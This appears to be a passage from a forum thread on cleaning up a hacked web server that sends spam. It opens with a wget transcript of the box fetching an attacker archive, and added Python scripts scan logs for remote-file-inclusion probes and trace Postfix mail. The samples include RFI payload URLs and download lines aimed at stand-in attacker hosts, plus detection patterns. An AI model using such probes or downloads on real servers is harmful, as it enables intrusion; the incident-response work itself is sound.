Verbindungsaufbau zu moltodos.com|174.132.116.5|:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 964393 (942K) [application/x-tar]
In »cyc.tgz« speichern.

     0K .......... .......... .......... .......... ..........  5% 59,4K 15s
    50K .......... .......... .......... .......... .......... 10%  213K 9s
   100K .......... .......... .......... .......... .......... 15%  219K 7s
   150K .......... .......... .......... .......... .......... 21%  230K 6s
   200K .......... .......... .......... .......... .......... 26%  237K 5s
   250K .......... .......... .......... .......... .......... 31%  286K 4s
   300K .......... .......... .......... .......... .......... 37%  261K 4s
   350K .......... .......... .......... .......... .......... 42%  335K 3s
   400K .......... .......... .......... .......... .......... 47%  213K 3s
   450K .......... .......... .......... .......... .......... 53%  231K 2s
   500K .......... .......... .......... .......... .......... 58%  220K 2s
   550K .......... .......... .......... .......... .......... 63%  231K 2s
   600K .......... .......... .......... .......... .......... 69%  529K 1s
   650K .......... .......... .......... .......... .......... 74%  249K 1s
   700K .......... .......... .......... .......... .......... 79%  229K 1s
   750K .......... .......... .......... .......... .......... 84%  231K 1s
   800K .......... .......... .......... .......... .......... 90%  255K 0s
   850K .......... .......... .......... .......... .......... 95%  250K 0s
   900K .......... .......... .......... .......... .         100%  336K=4,4s

2009-02-17 17:17:23 (214 KB/s) - »cyc.tgz« gespeichert [964393/964393]

Have fun cleaning up.
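An added example (not part of the post above) that does the access_log/error_log review just described in Python: it flags requests that pass an absolute URL as a parameter value, the remote-file-inclusion pattern of the ?commonpath=http://... hits earlier in the thread, and lines in error_log that look like the wget/tar transcript quoted above. All sample lines, IPs and domains are constructed placeholders.

```python
"""Flag remote-file-inclusion probes in an Apache access_log and download traces in error_log."""
import re
from typing import Dict, List
from urllib.parse import parse_qsl

# Constructed sample access_log (combined format); IPs/domains are placeholders.
SAMPLE_ACCESS = """\
192.0.2.44 - - [03/Apr/2009:18:52:12 +0200] "GET //?commonpath=http://attacker.example/id.txt?? HTTP/1.1" 403 286 "-" "Mozilla/5.0" "-"
192.0.2.44 - - [03/Apr/2009:18:52:13 +0200] "GET /samPHPweb//?commonpath=http%3A%2F%2Fattacker.example%2Fid.txt%3F%3F HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "-"
198.51.100.7 - - [03/Apr/2009:18:53:33 +0200] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 1049 "-" "-" "-"
198.51.100.9 - - [03/Apr/2009:18:54:01 +0200] "GET /redirect.php?url=https://www.example.org/ HTTP/1.1" 302 0 "-" "-" "-"
"""
# Constructed error_log excerpt in the shape of the wget/tar output quoted in the thread.
SAMPLE_ERROR = """\
[Fri Apr 03 18:52:13 2009] [error] [client 192.0.2.44] PHP Notice: Undefined index in /var/www/sam/x.php on line 3
--2009-04-03 18:52:14--  http://attacker.example/tool.tgz
Saving to: `tool.tgz'
sh: line 1: ./run: No such file or directory
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.I)  # a parameter VALUE that is itself a URL

ERROR_PATTERNS = {
    "archive fetched": re.compile(r"\.t(ar\.)?gz\b", re.I),
    "wget transcript": re.compile(r"^--\d{4}-\d\d-\d\d \d\d:\d\d:\d\d--\s+\S+"),
    "attempt to run dropped file": re.compile(r"\./run\b"),
}


def rfi_findings(access_log: str) -> List[Dict[str, str]]:
    """One finding per (request, parameter) whose decoded value is an absolute URL."""
    findings = []
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        _, _, query = m["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes %3A%2F%2F
            if REMOTE_URL_RE.match(value):
                status = m["status"]
                findings.append({
                    "ip": m["ip"], "ts": m["ts"], "param": name, "url": value, "status": status,
                    "verdict": "blocked (403)" if status == "403" else f"not blocked ({status}): check error_log",
                })
    return findings  # legitimate URL parameters (e.g. redirect targets) surface too and need review


def error_log_findings(error_log: str) -> List[Dict[str, str]]:
    """Lines that look like a download/unpack/execute sequence run by the web server user."""
    findings = []
    for n, line in enumerate(error_log.splitlines(), 1):
        for reason, pat in ERROR_PATTERNS.items():
            if pat.search(line):
                findings.append({"line": str(n), "reason": reason, "text": line})
    return findings


if __name__ == "__main__":
    for f in rfi_findings(SAMPLE_ACCESS):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['url']} -> {f['verdict']}")
    for f in error_log_findings(SAMPLE_ERROR):
        print(f"error_log line {f['line']}: {f['reason']}: {f['text']}")
```

Point both functions at the real files (open(...).read()) for the two-day window the post recommends; a 200 on a flagged request is the case to follow up in error_log.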
 
Let's stick with the mail topic for now, to find out whether the mails are being sent directly from the machine or whether the machine is only being abused as a relay. You write that 500 MB of logs accumulated today alone. That's not good, because it means you haven't stopped the mail server. You should do that immediately.

The log excerpt you posted is unfortunately still not helpful, since the beginning is missing. You listed all the parts that were processed by one qmgr process, but not the other processes that belong to a mail, which include the smtpd among others. It is best to stick with a single message ID and post the logs belonging to it completely.
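As an added example (not from the thread), this Python script applies the two joining rules given earlier, same queue ID across cleanup/qmgr/smtp and same PID for the smtpd session lines, to rebuild one message's trace from connect to delivery, and then answers the question asked here: did the message enter via pickup (submitted locally, e.g. by a PHP script running as www-data) or via smtpd (relayed over SMTP)? The log lines, addresses and TEST-NET IPs are constructed; the queue IDs reuse the format seen in the thread.

```python
"""Rebuild per-message Postfix traces (join on queue ID and smtpd PID) and classify entry points."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample in the Postfix 2.3 syslog layout used in the thread (host "force");
# addresses and IPs are placeholders (example.invalid, TEST-NET ranges).
SAMPLE_LOG = """\
Apr  3 17:03:04 force postfix/smtpd[10728]: connect from unknown[192.0.2.25]
Apr  3 17:03:07 force postfix/smtpd[10728]: 430E1300CE3: client=unknown[192.0.2.25]
Apr  3 17:03:07 force postfix/cleanup[10740]: 430E1300CE3: message-id=<c1@example.invalid>
Apr  3 17:03:07 force postfix/qmgr[10721]: 430E1300CE3: from=<bob@example.invalid>, size=5807, nrcpt=1 (queue active)
Apr  3 17:03:08 force postfix/smtp[10752]: 430E1300CE3: to=<alice@example.invalid>, relay=mx.example.invalid[192.0.2.10]:25, delay=1.2, delays=0.5/0.1/0.3/0.3, dsn=2.0.0, status=sent (250 OK)
Apr  3 17:03:09 force postfix/smtpd[10728]: disconnect from unknown[192.0.2.25]
Apr  3 06:29:40 force postfix/pickup[9730]: 985C26BFB0E: uid=33 from=<www-data>
Apr  3 06:29:40 force postfix/cleanup[9745]: 985C26BFB0E: message-id=<c2@force.server.xx>
Apr  3 06:29:45 force postfix/qmgr[9731]: 985C26BFB0E: from=<www-data@force.server.xx>, size=2000, nrcpt=1 (queue active)
Apr  3 06:29:45 force postfix/qmgr[9731]: 985C26BFB0E: to=<carol@example.invalid>, relay=none, delay=24956, delays=24956/0.05/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"postfix/(?P<proc>[\w-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
QID_RE = re.compile(r"^(?P<qid>[0-9A-F]{6,}): (?P<rest>.*)$")  # queue ID: upper-case hex, constant per message


@dataclass
class Record:
    lineno: int
    ts: str
    proc: str
    pid: str
    qid: Optional[str]  # None for session lines such as 'connect from'
    msg: str


def parse_log(text: str) -> List[Record]:
    records = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a postfix line (or truncated)
        q = QID_RE.match(m["msg"])
        records.append(Record(n, m["ts"], m["proc"], m["pid"], q["qid"] if q else None, m["msg"]))
    return records


def build_traces(records: List[Record]) -> Dict[str, List[Record]]:
    """Group by queue ID, then attach the smtpd connect/disconnect lines that share the PID of 'client='."""
    traces: Dict[str, List[Record]] = defaultdict(list)
    for r in records:
        if r.qid:
            traces[r.qid].append(r)
    for recs in traces.values():
        for client in [r for r in recs if r.proc == "smtpd"]:
            session = [r for r in records if r.proc == "smtpd" and r.pid == client.pid and r.qid is None]
            before = [r for r in session if r.lineno < client.lineno and r.msg.startswith("connect from")]
            after = [r for r in session if r.lineno > client.lineno and r.msg.startswith("disconnect from")]
            recs.extend(before[-1:] + after[:1])  # nearest connect before, first disconnect after
        recs.sort(key=lambda r: r.lineno)
    return dict(traces)


def classify_origin(trace: List[Record]) -> Tuple[str, str]:
    """(entry daemon, detail): 'pickup' = injected locally via sendmail, 'smtpd' = arrived over SMTP."""
    for r in trace:
        if r.proc == "pickup":
            return "pickup", QID_RE.match(r.msg)["rest"]
    for r in trace:
        if r.proc == "smtpd" and r.qid and "client=" in r.msg:
            return "smtpd", r.msg.split("client=", 1)[1]
    return "unknown", "entry point not in this excerpt"


def origin_summary(traces: Dict[str, List[Record]]) -> Dict[str, int]:
    """Messages per entry daemon: mostly 'pickup' means the box itself generates the mail."""
    counts: Dict[str, int] = defaultdict(int)
    for trace in traces.values():
        counts[classify_origin(trace)[0]] += 1
    return dict(counts)


def format_trace(qid: str, trace: List[Record]) -> str:
    kind, detail = classify_origin(trace)
    out = [f"== {qid}: {kind} ({detail})"]
    out += [f"  {r.ts} {r.proc}[{r.pid}] {r.msg}" for r in trace]
    return "\n".join(out)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    traces = build_traces(parse_log(text))
    for qid, trace in traces.items():
        print(format_trace(qid, trace))
    print("origins:", origin_summary(traces))
```

Run it against /var/log/mail.info (or a grep for one queue ID plus the matching smtpd PID) to get the single complete trace requested above; a pickup entry with uid=33 points at the web server user rather than at an open relay.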
 
Perhaps a scan with rkhunter or ClamAV would be worthwhile, to check whether there is malware on the system.
 